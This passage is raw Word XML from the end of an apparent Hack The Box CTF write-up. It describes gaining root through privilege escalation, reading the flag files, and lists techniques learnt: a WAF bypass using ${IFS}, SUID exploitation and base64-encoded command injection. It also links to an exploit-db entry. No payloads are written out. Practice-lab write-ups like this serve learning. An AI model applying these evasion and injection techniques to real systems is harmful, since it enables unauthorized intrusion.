        <w:t xml:space="preserve"> work, we follow below process:</w:t>
      </w:r>
      <w:r w:rsidR="00B12BA8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="49631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exploit-3 &amp; roottx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A8" w:rsidRDefault="00B12BA8" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">BOOMM!! We have the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp; can see the username as root. In this way, we got </w:t>
      </w:r>
      <w:r w:rsidRPr="00B12BA8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>root.txt first</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BA8" w:rsidRDefault="00B12BA8" w:rsidP="00E13EE7">
      <w:r>
        <w:t xml:space="preserve">Step 15: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BA8" w:rsidRDefault="00B12BA8" w:rsidP="00E13EE7">
      <w:r>
        <w:t>Similarly, now we can access the user.txt we found earlier by accessing the /home/Shelby.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BA8" w:rsidRDefault="00C45AF0" w:rsidP="00E13EE7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5197290" cy="291871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tx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AF0" w:rsidRDefault="00C45AF0" w:rsidP="00E13EE7">
      <w:r>
        <w:t>Things I learnt:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AF0" w:rsidRPr="00C45AF0" w:rsidRDefault="00C45AF0" w:rsidP="00C45AF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C45AF0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>My first “Medium” machine of HTB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AF0" w:rsidRPr="00C45AF0" w:rsidRDefault="00C45AF0" w:rsidP="00C45AF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Bypassing of WAF using ${IFS}.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C45AF0" w:rsidRPr="00D34685" w:rsidRDefault="00C45AF0" w:rsidP="00C45AF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>SUID exploiting</w:t>
      </w:r>
      <w:r w:rsidR="00D34685">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D34685" w:rsidRPr="005454DD" w:rsidRDefault="00D34685" w:rsidP="00C45AF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Different method of command injection by encoding the payload in base64.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005454DD" w:rsidRDefault="009F4BE3" w:rsidP="005454DD">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F4BE3" w:rsidRPr="009F4BE3" w:rsidRDefault="009F4BE3" w:rsidP="005454DD">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>HAPPY HACKING!!!!</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="009F4BE3" w:rsidRPr="009F4B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4F77D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="280844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E5232D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7867AA6"/>
    <w:lvl w:ilvl="0" w:tplc="1C08AB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B57"/>
    <w:rsid w:val="00073F03"/>
    <w:rsid w:val="000A2803"/>
    <w:rsid w:val="000D136A"/>
    <w:rsid w:val="00105248"/>
    <w:rsid w:val="001076FE"/>
    <w:rsid w:val="00147FDC"/>
    <w:rsid w:val="001B422C"/>
    <w:rsid w:val="002B2D37"/>
    <w:rsid w:val="002D68E1"/>
    <w:rsid w:val="002E51D7"/>
    <w:rsid w:val="00342EF3"/>
    <w:rsid w:val="00376185"/>
    <w:rsid w:val="003B3E81"/>
    <w:rsid w:val="003F1E11"/>
    <w:rsid w:val="0044477E"/>
    <w:rsid w:val="005454DD"/>
    <w:rsid w:val="006A5BB8"/>
    <w:rsid w:val="007C6F8B"/>
    <w:rsid w:val="008A272A"/>
    <w:rsid w:val="009F4BE3"/>
    <w:rsid w:val="00A60547"/>
    <w:rsid w:val="00AC737C"/>
    <w:rsid w:val="00B12BA8"/>
    <w:rsid w:val="00BD085F"/>
    <w:rsid w:val="00C1159C"/>
    <w:rsid w:val="00C45AF0"/>
    <w:rsid w:val="00D17544"/>
    <w:rsid w:val="00D222B3"/>
    <w:rsid w:val="00D34685"/>
    <w:rsid w:val="00DA1124"/>
    <w:rsid w:val="00DB32A5"/>
    <w:rsid w:val="00DC26F9"/>
    <w:rsid w:val="00E038F2"/>
    <w:rsid w:val="00E0794A"/>
    <w:rsid w:val="00E13EE7"/>
    <w:rsid w:val="00FF4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1E1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7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38F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1E1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27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7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38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livefirelabs.com/unix_tip_trick_shell_script/oct_2003/10132003.htm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youtube.com/watch?v=99efqO48kK4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exploit-db.com/exploits/4115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bZlkuiUkQzE" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/magnetikonline/5172b4dafcdc079f28e60f512528c8a6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31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-19T09:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-14T15:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>